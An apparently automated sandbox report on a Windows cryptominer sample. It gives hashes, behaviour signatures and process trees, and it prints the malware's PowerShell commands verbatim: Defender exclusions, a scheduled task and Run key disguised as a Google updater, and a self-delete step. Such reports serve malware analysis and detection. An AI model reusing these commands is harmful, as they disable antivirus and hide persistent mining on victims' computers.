Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...y8.exe
windows10-2004-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...SE.exe
windows10-2004-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...CD.exe
windows10-2004-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...Da.exe
windows10-2004-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...wq.exe
windows10-2004-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...r7.exe
windows10-2004-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows10-2004-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...eg.exe
windows10-2004-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...5H.exe
windows10-2004-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...XN.exe
windows10-2004-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...T3.exe
windows10-2004-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...9r.exe
windows10-2004-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...GR.exe
windows10-2004-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EX.exe
windows10-2004-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...EA.exe
windows10-2004-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...FB.exe
windows10-2004-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
1800s -
max time network
1791s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
23-01-2024 19:27
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231129-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231129-en
Behavioral task
behavioral30
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral31
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 1820 created 1204 1820 UU4Ddwqm5zcuLzGR.exe 18 PID 1820 created 1204 1820 UU4Ddwqm5zcuLzGR.exe 18 PID 1820 created 1204 1820 UU4Ddwqm5zcuLzGR.exe 18 PID 1820 created 1204 1820 UU4Ddwqm5zcuLzGR.exe 18 PID 3032 created 1204 3032 updater.exe 18 PID 3032 created 1204 3032 updater.exe 18 PID 3032 created 1204 3032 updater.exe 18 PID 3032 created 1204 3032 updater.exe 18 PID 1476 created 1204 1476 conhost.exe 18 PID 3032 created 1204 3032 updater.exe 18 -
XMRig Miner payload 29 IoCs
resource yara_rule behavioral25/memory/2380-72-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-74-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-76-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-78-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-88-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-90-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-92-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-94-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-96-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-98-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-100-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-102-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-104-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-106-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-108-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-110-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-112-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-114-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-116-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-118-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-120-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-122-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-124-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-126-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-128-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral25/memory/2380-130-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2620 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 3032 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 2900 taskeng.exe -
resource yara_rule behavioral25/memory/2380-68-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-72-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-74-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-76-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-78-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-88-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-90-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-92-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-94-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-96-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-98-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-100-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-102-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-104-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-106-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-108-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-110-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-112-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-114-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-116-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-118-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-120-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-122-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-124-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-126-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-128-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral25/memory/2380-130-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3032 set thread context of 1476 3032 updater.exe 51 PID 3032 set thread context of 2380 3032 updater.exe 53 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe UU4Ddwqm5zcuLzGR.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2692 schtasks.exe 1628 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1196 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 509eb183ba4fda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 1820 UU4Ddwqm5zcuLzGR.exe 1820 UU4Ddwqm5zcuLzGR.exe 2724 powershell.exe 1820 UU4Ddwqm5zcuLzGR.exe 1820 UU4Ddwqm5zcuLzGR.exe 2800 powershell.exe 1820 UU4Ddwqm5zcuLzGR.exe 1820 UU4Ddwqm5zcuLzGR.exe 1820 UU4Ddwqm5zcuLzGR.exe 1820 UU4Ddwqm5zcuLzGR.exe 2596 powershell.exe 3032 updater.exe 3032 updater.exe 2488 powershell.exe 3032 updater.exe 3032 updater.exe 984 powershell.exe 3032 updater.exe 3032 updater.exe 3032 updater.exe 3032 updater.exe 1476 conhost.exe 1476 conhost.exe 3032 updater.exe 3032 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 2724 powershell.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeDebugPrivilege 2488 powershell.exe Token: SeDebugPrivilege 984 powershell.exe Token: SeDebugPrivilege 3032 updater.exe Token: SeAssignPrimaryTokenPrivilege 1196 WMIC.exe Token: SeIncreaseQuotaPrivilege 1196 WMIC.exe Token: SeSecurityPrivilege 1196 WMIC.exe Token: SeTakeOwnershipPrivilege 1196 WMIC.exe Token: SeLoadDriverPrivilege 1196 WMIC.exe Token: SeSystemtimePrivilege 1196 WMIC.exe Token: SeBackupPrivilege 1196 WMIC.exe Token: SeRestorePrivilege 1196 WMIC.exe Token: SeShutdownPrivilege 1196 WMIC.exe Token: SeSystemEnvironmentPrivilege 1196 WMIC.exe Token: SeUndockPrivilege 1196 WMIC.exe Token: SeManageVolumePrivilege 1196 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1196 WMIC.exe Token: SeIncreaseQuotaPrivilege 1196 WMIC.exe Token: SeSecurityPrivilege 1196 WMIC.exe Token: SeTakeOwnershipPrivilege 1196 WMIC.exe Token: SeLoadDriverPrivilege 1196 WMIC.exe Token: SeSystemtimePrivilege 1196 WMIC.exe Token: SeBackupPrivilege 1196 WMIC.exe Token: SeRestorePrivilege 1196 WMIC.exe Token: SeShutdownPrivilege 1196 WMIC.exe Token: SeSystemEnvironmentPrivilege 1196 WMIC.exe Token: SeUndockPrivilege 1196 WMIC.exe Token: SeManageVolumePrivilege 1196 WMIC.exe Token: SeLockMemoryPrivilege 2380 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2800 wrote to memory of 2692 2800 powershell.exe 32 PID 2800 wrote to memory of 2692 2800 powershell.exe 32 PID 2800 wrote to memory of 2692 2800 powershell.exe 32 PID 2620 wrote to memory of 3052 2620 cmd.exe 33 PID 2620 wrote to memory of 3052 2620 cmd.exe 33 PID 2620 wrote to memory of 3052 2620 cmd.exe 33 PID 2596 wrote to memory of 1716 2596 powershell.exe 38 PID 2596 wrote to memory of 1716 2596 powershell.exe 38 PID 2596 wrote to memory of 1716 2596 powershell.exe 38 PID 2900 wrote to memory of 3032 2900 taskeng.exe 40 PID 2900 wrote to memory of 3032 2900 taskeng.exe 40 PID 2900 wrote to memory of 3032 2900 taskeng.exe 40 PID 984 wrote to memory of 1628 984 powershell.exe 45 PID 984 wrote to memory of 1628 984 powershell.exe 45 PID 984 wrote to memory of 1628 984 powershell.exe 45 PID 3032 wrote to memory of 1476 3032 updater.exe 51 PID 272 wrote to memory of 1196 272 cmd.exe 48 PID 272 wrote to memory of 1196 272 cmd.exe 48 PID 272 wrote to memory of 1196 272 cmd.exe 48 PID 3032 wrote to memory of 2380 3032 updater.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1204
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2692
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:1716
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1628
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:272 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:868
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1476
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵PID:3052
-
C:\Windows\system32\taskeng.exetaskeng.exe {6B685993-242E-4901-9D58-8FF5683A7BF4} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3032
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
523KB
MD5742a430fa9f555478b245116a5abc1b8
SHA120ee7ac11f37859d67dfdea76373fcca1385c355
SHA256b2befc043ec96b1f011808abd786415d2d8c9afeeda68018b7879f924e87154a
SHA51243894d6f77868398d30ae0b17f8a4070de700c3cad1c5dc2d262f4e31a35908825acea9dfda4b8258399959867fea6b2a73e1999eb76e6aea74eee39460cc956
-
Filesize
700KB
MD5e1b8a1a4bbe76790bc886a93b06a1c01
SHA10b418a345c179a26234bf7fc2bff1f15270bc7e8
SHA2563fbb7da8323b77a6bac73dfe2e3cecbaa88e0ffb57833f6054ea2a9efbd92f72
SHA512e160a1f23a762c1965f2cc2cd18ed853c8650b0e76f1878da6e36a2eba41334c4fc6b8f7a3427c3f45468b2a9c497c9d0b20f3b7e00e086e9fc6884489be35a7
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\11ZVXHBNLEXXG3THVCHZ.temp
Filesize7KB
MD5cc3a5ed30f5a2d42b68aee33d8320a02
SHA1b0c86998a75dbf9204321159bd92d0036d33f11f
SHA256c9109b485072f4886e27a454fa02ff7de7f488f50dab68a658b3146872637621
SHA512b223fb6f4f2998d61a394c040e711e94c895a75da563f3d281e72d3389ffb77700e60423978723ce4d3b9aed1bbe5fb49d24b69eef697505136c8fb81e78cdc0
-
Filesize
462KB
MD507be3e53055396f955cce8512dcde1a4
SHA1ac44cddd9aeead5d3fb96a4f81b02e3ed2c2a9b1
SHA2568be804ed4d0b7e51b73f657fd46f6296ecc4235fb23e4c9feb866ce01e3ad4ae
SHA51263e69292b81102be7cc079b21003eb139144d111097dc1599c419379228cc091a46ac17861259d3a0e60f9dea1b8c99ac94f016dc3213681d60f8b1556f5717e